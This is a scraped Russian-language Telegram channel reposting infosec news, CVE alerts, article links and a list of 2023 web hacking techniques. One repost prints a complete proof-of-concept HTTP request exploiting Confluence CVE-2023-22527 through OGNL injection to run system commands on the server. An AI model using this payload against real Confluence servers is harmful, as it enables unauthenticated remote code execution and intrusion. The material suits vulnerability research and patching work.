Склад
346 subscribers
360 photos
33 videos
62 files
951 links
Хранилка ссылок и документов
Download Telegram
Не жили хорошо нефиг и начинать, джуны это одно сплошное решето) хотя JunOS удобна и хороша
https://thehackernews.com/2024/01/critical-rce-vulnerability-uncovered-in.html
👍1🔥1
💻 Microsoft опубликовали очередные обновления в плане укрепления безопасности Windows. В первом квартале этого года продолжается внедрение более жёстких политик аутентификации по сертификатам (Kerberos PAC) , изменение разрешений Active Directory, а также раскатываются обновления, пополняющие «чёрный список UEFI» (DBX) и препятствующие эксплуатации CVE-2023-24932, которая применяется в бутките BlackLotus. Учитывая, что буткит был слит летом в открытый доступ, применение этих политик стало ещё актуальней, несмотря на необходимость обновлять все загрузочные носители, включая резервные.

#новости @П2Т
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from infosec
👩‍💻 Nginx Path Configuration Pitfalls.

Nginx — это веб-сервер, на котором работает треть всех сайтов в мире. Но если забыть или проигнорировать некоторые ошибки в настройках, можно стать отличной мишенью для атакующих. Благодаря этому материалу, можно понять какие ошибки в конфигурациях встречаются чаще всего и как их исправить.

Attacks:
Nginx Configuration Vulnerability;
Exploiting Trailing Slash Misconfiguration;
Exploiting Parent Directory Access;
Impact Without Trailing Slash on Alias;
Combined Impact.

Defend Against Attacks:
Update Nginx;
Configuration Check;
Use Configuration Management;
Security Headers;
Access Control;
Directory Listing;
Alias Traversal Protection;
HTTP to HTTPS Redirect;
SSL Configuration;
Rate Limiting;
Connection Limits;
Custom Error Pages;
Gzip Compression;
Client-Side Caching;
HTTP2 Protocol;
Secure File Permissions;
Web Application Firewall (WAF);
Monitoring and Logging;
SSH Hardening;
Firewall Configuration;
Two-Factor Authentication;
Regular Backups;
Deny Hidden Files;
IP Whitelisting;
Disable Unused Modules;
Use Trailing Slash in Alias Directives;
Regular Expression Matching;
Implement Strict Location Paths.

#Nginx #devsecops
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from вольтаж
👁 Курс на мисконфиги. Как поймать проблемный CORS на проде

На новогодних праздниках, вместо поедания мандаринов, решил совместно с SidneyJob, провести исследование поведений браузеров при мисконфигурации CORS.

Разобрали как работает SOP и CORS, посмотрели возможные мисконфиги и способы их эксплуатации, провели несколько экспериментов, и даже вспомнили, как работают регулярки.

Мы даже сделали для этого отдельную лабу! В ней ты сможешь создавать свои PoC'и при мисконфигурация CORS'a и сразу же кидать на них ссылки уже в отчёте.

Всё получившееся собрали вместе и выпустили как нашу первую статью на xakep.ru. Приятного чтения!

https://xakep.ru/2024/01/18/cors-cheatsheet/
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
Forwarded from Cybred
Исследователь, который в прошлый раз взломал «Хонду», продолжает рассказывать о своих находках. На этот раз в Toyota

🔹Premium-калькулятор на сайте компании ликал секреты от учетной записи корпоративного аккаунта Microsoft.

🔹Один из запросов к калькулятору был закрыт HTTP Basic Auth, но возвращал ошибку с валидными кредами (!).

🔹Пароль можно было использовать для входа в аккаунт noreplyeicher@ttibi.co.in, 2FA был отключен

🔹В учетной записи электронной почты хранились все сообщения, которые компания когда-либо отправляла своим клиентам, а именно: 657 тысяч писем (~25 ГБ) с информацией о клиентах, PDF-файлами страховых полисов, ссылками на сброс пароля, OTP и многое другое.

🔹 Помимо почты, были доступны и другие облачные ресурсы Microsoft, включая SharePoint, Teams, и многое другое

🫠 Спустя два месяца, баг исправили, но до сих пор не сменили пароль от найденной учетки.
👍1
Forwarded from PT SWARM
Atlassian Confluence - Remote Code Execution (CVE-2023-22527)

👤 by Rahul Maini & Harsh Jaiswal

CVE-2023-22527 is a critical vulnerability within Atlassian's Confluence Server and Data Center. This vulnerability has the potential to permit unauthenticated attackers to inject OGNL expressions into the Confluence Instance, thereby enabling the execution of arbitrary code and system commands.

📝 Contents:
● Technical Details
• Initial Analysis
• Identifying the Unauthenticated Attack Surface
● OGNL Expression Evaluation
● Remote Code Execution via OGNL Injection

https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/
👍2
Forwarded from BI.ZONE Live (переехали)
®️ Псс, это что OFFZONE 2024?

Да! Наша пятая юбилейная конференция OFFZONE 2024 пройдет 22 и 23 августа в Москве.

В центре внимания, как всегда, отборный технический контент и все, что за пять лет стало нашими добрыми традициями: пайка, кастомизация бейджей, тату-зона, стенды от комьюнити, крутейший мерч и активности на любой вкус.

Вступайте в канал сообщества и следите за новостями 👁

Подробнее читайте на сайте.
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Двойная кавычка (Bo0oM)
Confluence Pre-Auth Remote Code Execution via OGNL Injection
CVE-2023-22527

PoC:


POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))


#Confluence

>
👍3
Forwarded from infosec
🌍 Top 10 web hacking techniques of 2023..

• Номинация - top 10 лучших методов веб-взлома в 2023 году. Каждая статья заслуживает внимания:

- Ransacking your password reset tokens;
- mTLS: When certificate authentication is done wrong;
- Smashing the state machine: the true potential of web race conditions;
- Bypass firewalls with of-CORs and typo-squatting;
- RCE via LDAP truncation on hg.mozilla.org;
- Cookie Bugs - Smuggling & Injection;
- OAuth 2.0 Redirect URI Validation Falls Short, Literally;
- Prototype Pollution in Python;
- Pretalx Vulnerabilities: How to get accepted at every conference;
- From Akamai to F5 to NTLM... with love;
- can I speak to your manager? hacking root EPP servers to take control of zones;
- Blind CSS Exfiltration: exfiltrate unknown web pages;
- Server-side prototype pollution: Black-box detection without the DoS;
- Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari;
- HTML Over the Wire;
- SMTP Smuggling - Spoofing E-Mails Worldwide;
- DOM-based race condition: racing in the browser for fun;
- You Are Not Where You Think You Are, Opera Browsers Address Bar Spoofing Vulnerabilities;
- CVE-2022-4908: SOP bypass in Chrome using Navigation API;
- SSO Gadgets: Escalate (Self-)XSS to ATO;
- Three New Attacks Against JSON Web Tokens;
- Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix;
- PHP filter chains: file read from error-based oracle;
- SSRF Cross Protocol Redirect Bypass;
- A New Vector For “Dirty” Arbitrary File Write to RCE;
- How I Hacked Microsoft Teams and got $150,000 in Pwn2Own;
- AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice;
- BingBang: AAD misconfiguration led to Bing.com results manipulation and account takeover;
- MyBB Admin Panel RCE CVE-2023-41362;
- Source Code at Risk: Critical Code Vulnerability in CI/CD Platform TeamCity;
- Code Vulnerabilities Put Skiff Emails at Riskr;
- How to break SAML if I have paws?
- JMX Exploitation Revisited;
- Java Exploitation Restrictions in Modern JDK Times;
- Exploiting Hardened .NET Deserialization;
- Unserializable, but unreachable: Remote code execution on vBulletin;
- Cookieless DuoDrop: IIS Auth Bypass & App Pool Privesc in ASP.NET Framework;
- Hunting for Nginx Alias Traversals in the wild;
- DNS Analyzer - Finding DNS vulnerabilities with Burp Suite;
- Oh-Auth - Abusing OAuth to take over millions of accounts;
- nOAuth: How Microsoft OAuth Misconfiguration Can Lead to Full Account Takeover;
- One Scheme to Rule Them All: OAuth Account Takeover;
- Exploiting HTTP Parsers Inconsistencies;
- New ways of breaking app-integrated LLMs;
- State of DNS Rebinding in 2023;
- Fileless Remote Code Execution on Juniper Firewalls;
- Thirteen Years On: Advancing the Understanding of IIS Short File Name (SFN) Disclosure!
- Metamask Snaps: Playing in the Sand;
- Uncovering a crazy privilege escalation from Chrome extensions;
- Code Vulnerabilities Put Proton Mails at Risk;
- Hacking into gRPC-Web;
- Yelp ATO via XSS + Cookie Bridge;
- HTTP Request Splitting vulnerabilities exploitation;
- XSS in GMAIL Dynamic Email;
- Azure B2C Crypto Misuse and Account Compromise;
- Compromising F5 BIGIP with Request Smuggling;
- One Supply Chain Attack to Rule Them All;
- Cookie Crumbles: Breaking and Fixing Web Session Integrity;
- tRPC Security Research: Hunting for Vulnerabilities in Modern APIs;
- From an Innocent Client-Side Path Traversal to Account Takeover.

#web #hack
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3
Forwarded from The Hacker News
🚨 Urgent: Critical Jenkins RCE vulnerability (CVE-2024-23897) discovered.

Hackers can remotely control your CI/CD pipelines. Patch immediately to prevent malicious code in builds.

Details here: https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html
👍2